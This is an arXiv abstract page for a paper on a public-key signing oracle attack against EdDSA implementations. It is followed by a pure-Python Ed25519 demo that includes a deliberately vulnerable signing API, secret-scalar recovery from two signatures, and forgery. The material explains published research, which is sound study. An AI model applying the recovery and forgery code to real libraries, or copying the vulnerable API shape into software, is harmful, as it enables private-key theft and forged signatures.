Double Public Key Signing Function Oracle Attack on EdDSA Software Implementations (2308.15009v2)

Published 29 Aug 2023 in cs.CR

Abstract: EdDSA is a standardised elliptic curve digital signature scheme introduced to overcome some of the issues prevalent in the more established ECDSA standard. Because the EdDSA standard requires signatures to be deterministic, a signing function that takes the public key as an input, and can therefore be used by the attacker as a public key signing oracle, lets the attacker break the unforgeability notion of security of the scheme. This paper describes an attack against some of the most popular EdDSA implementations in which an adversary recovers the private key used during signing. With this recovered secret key, an adversary can sign arbitrary messages that the EdDSA verification function accepts as valid. A list of libraries with vulnerable APIs at the time of publication is provided. Furthermore, the paper makes two suggestions for securing EdDSA signing APIs against this vulnerability and discusses failed attempts to solve the issue.
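The mechanism the abstract describes, worked through end to end on a small pure-Python Ed25519. This is an added example, not code from the paper or from any of the libraries it lists. The field and group arithmetic follows the RFC 8032 reference algorithm (affine coordinates, no point validation, not constant-time, illustration only). The function names, the vulnerable API shape sign_vulnerable(seed, pk, msg), the seeds and the messages are constructed for this demo; sign_hardened is this example's own contrast and is not claimed to be one of the paper's two suggestions. The attack needs two signatures on the same message from the same signer, obtained by passing two different public keys to the signing function: the deterministic nonce r is identical in both, so S1 - S2 = (h1 - h2) * a mod L and the secret scalar a falls out.

```python
import hashlib

# Ed25519 parameters (RFC 8032): field prime, group order, curve constant d
p = 2**255 - 19
L = 2**252 + 27742317777372353535851937790883648493
d = (-121665 * pow(121666, p - 2, p)) % p

def inv(x):
    return pow(x, p - 2, p)

def point_add(P, Q):
    # Unified twisted-Edwards addition (a = -1); also used for doubling.
    (x1, y1), (x2, y2) = P, Q
    t = d * x1 * x2 * y1 * y2 % p
    u = inv((1 + t) * (1 - t) % p)          # one inversion serves both coordinates
    return ((x1 * y2 + x2 * y1) * (1 - t) * u % p,
            (y1 * y2 + x1 * x2) * (1 + t) * u % p)

def scalar_mult(e, P):
    Q = (0, 1)                              # neutral element
    while e:
        if e & 1:
            Q = point_add(Q, P)
        P = point_add(P, P)
        e >>= 1
    return Q

def xrecover(y):
    xx = (y * y - 1) * inv(d * y * y + 1) % p
    x = pow(xx, (p + 3) // 8, p)
    if (x * x - xx) % p:
        x = x * pow(2, (p - 1) // 4, p) % p
    return p - x if x & 1 else x

By = 4 * inv(5) % p
B = (xrecover(By), By)                      # base point

def encode_point(P):
    x, y = P
    return (y | ((x & 1) << 255)).to_bytes(32, "little")

def decode_point(s):
    y = int.from_bytes(s, "little")
    sign, y = y >> 255, y & ((1 << 255) - 1)
    x = xrecover(y)
    return (p - x if (x & 1) != sign else x, y)

def hash_to_scalar(data):
    return int.from_bytes(hashlib.sha512(data).digest(), "little") % L

def expand_seed(seed):
    h = hashlib.sha512(seed).digest()
    a = (int.from_bytes(h[:32], "little") & ((1 << 254) - 8)) | (1 << 254)
    return a, h[32:]                        # clamped scalar, nonce prefix

def public_key(seed):
    return encode_point(scalar_mult(expand_seed(seed)[0], B))

def sign_vulnerable(seed, pk, msg):
    # VULNERABLE API SHAPE: the caller-supplied pk is hashed into the challenge,
    # while the nonce r depends only on (prefix, msg) and so repeats across pk values.
    a, prefix = expand_seed(seed)
    r = hash_to_scalar(prefix + msg)
    R = encode_point(scalar_mult(r, B))
    S = (r + hash_to_scalar(R + pk + msg) * a) % L
    return R + S.to_bytes(32, "little")

def sign_hardened(seed, msg):
    # This example's own hardening: derive pk from the seed, never take it from the caller.
    return sign_vulnerable(seed, public_key(seed), msg)

def verify(pk, msg, sig):
    R, S = sig[:32], int.from_bytes(sig[32:], "little")
    if S >= L:
        return False
    h = hash_to_scalar(R + pk + msg)
    return scalar_mult(S, B) == point_add(decode_point(R), scalar_mult(h, decode_point(pk)))

def recover_secret_scalar(msg, pk1, sig1, pk2, sig2):
    # Same r in both signatures, so S1 - S2 = (h1 - h2) * a (mod L); solve for a.
    R1, S1 = sig1[:32], int.from_bytes(sig1[32:], "little")
    R2, S2 = sig2[:32], int.from_bytes(sig2[32:], "little")
    if R1 != R2:
        raise ValueError("nonces differ: signer is not the deterministic oracle assumed here")
    h1, h2 = hash_to_scalar(R1 + pk1 + msg), hash_to_scalar(R2 + pk2 + msg)
    return (S1 - S2) * pow((h1 - h2) % L, L - 2, L) % L

def forge(a, pk, msg, nonce_material=b"attacker-chosen nonce"):
    # Knowing a (mod L) suffices; the verifier never checks how r was derived.
    r = hash_to_scalar(nonce_material + msg)
    R = encode_point(scalar_mult(r, B))
    S = (r + hash_to_scalar(R + pk + msg) * a) % L
    return R + S.to_bytes(32, "little")

def run_attack(seed, msg, forged_msg=b"pay the attacker"):
    # Two oracle queries on one message with two pk values -> secret scalar -> forgery.
    pk = public_key(seed)
    pk_bogus = public_key(b"\x01" * 32)     # constructed; any 32 bytes would serve
    sig_real = sign_vulnerable(seed, pk, msg)
    sig_oracle = sign_vulnerable(seed, pk_bogus, msg)
    a = recover_secret_scalar(msg, pk, sig_real, pk_bogus, sig_oracle)
    forged = forge(a, pk, forged_msg)
    # The scalar is recovered modulo L, which is all a signer ever uses.
    return a == expand_seed(seed)[0] % L, verify(pk, forged_msg, forged)
```

run_attack(bytes(range(32)), b"hello") returns (True, True): the recovered scalar matches the victim's clamped scalar modulo L, and a signature on a message the victim never saw verifies under the victim's real public key. Before trusting any result from a toy like this, confirm the arithmetic against RFC 8032 test 1 (the all-standard seed with the empty message) so that a verification bug is not mistaken for a successful forgery. Note that the attacker never needs the nonce prefix: the recovered scalar alone is enough to sign, and nothing in verification distinguishes a deterministic nonce from a random one.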
